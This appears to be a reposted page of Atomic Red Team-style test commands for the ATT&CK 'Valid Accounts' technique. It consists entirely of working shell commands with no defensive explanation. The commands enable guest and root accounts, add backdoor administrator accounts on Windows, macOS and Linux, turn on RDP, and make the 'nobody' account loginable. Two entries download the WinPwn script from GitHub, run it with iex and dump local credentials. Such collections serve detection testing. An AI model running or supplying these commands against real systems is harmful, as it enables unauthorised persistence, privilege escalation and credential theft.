Atomic - Initial Access

Published 2023-06-28 14:03:41 Author: 皇帽讲绿帽带法技巧

1078.001

Enable Guest account with RDP capability and admin privileges

net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f

Activate Guest Account

net user #{guest_user} /active:yes

Enable Guest Account on macOS

sudo sysadminctl -guestAccount on

1078.003

Create local account with admin privileges

net user art-test /add
net user art-test #{password}
net localgroup administrators art-test /add

Create local account with admin privileges - MacOS

dscl . -create /Users/AtomicUser
dscl . -create /Users/AtomicUser UserShell /bin/bash
dscl . -create /Users/AtomicUser RealName "Atomic User"
dscl . -create /Users/AtomicUser UniqueID 503
dscl . -create /Users/AtomicUser PrimaryGroupID 503
dscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser
dscl . -passwd /Users/AtomicUser mySecretPassword
dscl . -append /Groups/admin GroupMembership AtomicUser

Create local account with admin privileges using sysadminctl utility - MacOS

sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin

Enable root account using dsenableroot utility - MacOS

dsenableroot #current user
dsenableroot -u art-tester -p art-tester -r art-root #new user

Add a new/existing user to the admin group using dseditgroup utility - macOS

dseditgroup -o edit -a art-user -t user admin

WinPwn - Loot local Credentials - powerhell kittie

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive

WinPwn - Loot local Credentials - Safetykatz

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive

Create local account (Linux)

useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
su art
whoami
exit

Reactivate a locked/expired account (Linux)

useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
usermod --lock art
usermod --expiredate "1" art
usermod --unlock art
usermod --expiredate "99999" art
su art
whoami
exit

Login as nobody (Linux)

grep nobody /etc/passwd
# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
chsh --shell /bin/bash nobody
usermod --password $(openssl passwd -1 nobody) nobody
su nobody
whoami
exit